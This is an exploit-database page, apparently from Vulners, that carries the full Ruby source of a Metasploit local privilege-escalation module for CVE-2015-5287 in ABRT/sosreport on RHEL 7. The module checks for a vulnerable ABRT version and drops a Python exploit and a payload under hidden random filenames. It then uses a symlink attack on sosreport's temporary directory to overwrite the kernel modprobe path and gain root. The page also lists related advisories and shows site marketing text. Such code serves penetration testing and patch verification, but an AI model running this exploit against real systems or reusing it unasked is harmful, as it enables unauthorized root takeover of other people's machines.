Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ABRT - sosreport Privilege Escalation (Metasploit)

🗓️ 25 Sep 2019 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 225 Views

ABRT sosreport Privilege Escalation module for gaining root privileges on RHEL systems with vulnerable ABRT configuratio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Centos 7.1 / Fedora 22 - abrt Local Root Exploit
1 Dec 201500:00
zdt
0day.today		RHEL 7.0/7.1 - abrt/sosreport Local Root Exploit
1 Dec 201500:00
zdt
0day.today		ABRT - sosreport Privilege Escalation Exploit
26 Sep 201900:00
zdt
Tenable Nessus		CentOS 7 : abrt / libreport (CESA-2015:2505)
2 Dec 201500:00
nessus
Tenable Nessus		Fedora 23 : abrt-2.7.1-1.fc23 (2015-79c1758468)
4 Mar 201600:00
nessus
Tenable Nessus		MiracleLinux 7 : [security - medium] abrt and libreport (AXSA:2015-920:01)
16 Jan 202600:00
nessus
Tenable Nessus		Oracle Linux 7 : abrt / and / libreport (ELSA-2015-2505)
30 Nov 201500:00
nessus
Tenable Nessus		RHEL 7 : abrt and libreport (RHSA-2015:2505)
24 Nov 201500:00
nessus
Tenable Nessus		Scientific Linux Security Update : abrt and libreport on SL7.x x86_64 (20151123)
22 Dec 201500:00
nessus
Cent OS		abrt, libreport security update
1 Dec 201518:46
centos
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ABRT sosreport Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on RHEL systems with
        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
        as the crash handler.

        `sosreport` uses an insecure temporary directory, allowing local users
        to write to arbitrary files (CVE-2015-5287). This module uses a symlink
        attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path
        in `/proc/sys/kernel/modprobe`, resulting in root privileges.

        Waiting for `sosreport` could take a few minutes.

        This module has been tested successfully on:

        abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and
        abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rebel', # Discovery and sosreport-rhel7.py exploit
          'bcoles' # Metasploit
        ],
      'DisclosureDate' => '2015-11-23',
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [[ 'Auto', {} ]],
      'References'     =>
        [
          ['BID', '78137'],
          ['CVE', '2015-5287'],
          ['EDB', '38832'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'],
          ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'],
          ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837']
        ]
    ))
    register_options [
      OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir']
  end

  def timeout
    datastore['TIMEOUT']
  end

  def check
    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
      vprint_error 'System is not configured to use ABRT for crash reporting'
      return CheckCode::Safe
    end
    vprint_good 'System is configured to use ABRT for crash reporting'

    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
      vprint_error 'abrt-ccp service not running'
      return CheckCode::Safe
    end
    vprint_good 'abrt-ccpp service is running'

    # Patched in 2.1.11-35.el7
    pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s
    abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1]
    if abrt_version.blank?
      vprint_status 'Could not retrieve ABRT package version'
      return CheckCode::Safe
    end
    unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7')
      vprint_status "ABRT package version #{abrt_version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "ABRT package version #{abrt_version} is vulnerable"

    unless command_exists? 'python'
      vprint_error 'python is not installed'
      return CheckCode::Safe
    end
    vprint_good 'python is installed'

    CheckCode::Appears
  end

  def upload_and_chmodx(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    chmod path
    register_file_for_cleanup path
  end

  def exploit
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py')
    exe_name = ".#{rand_text_alphanumeric 5..10}"
    exe_path = "#{base_dir}/#{exe_name}"
    upload_and_chmodx exe_path, exe_data

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
    upload_and_chmodx payload_path, generate_payload_exe

    register_file_for_cleanup '/tmp/hax.sh'

    print_status "Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ..."
    output = cmd_exec "echo \"#{payload_path}& exit\" | #{exe_path}", nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Sep 2019 00:00Current
7High risk
Vulners AI Score7
CVSS 26.9
EPSS0.12902
privilege escalationrhelabrtvulnerabilitycve-2015-5287metasploitsymlink attackroot privilegessosreporttemporary directorymodprobekernelexploitrebelbcoles2015-11-23linuxx86_64armleaarch64ppcmipslemipsbeshellmeterpreterbid-78137edb-38832url-oss-security-2015-12-01url-rhsa-2015-2505url-cve-2015-5287url-bugzilla-1266837
225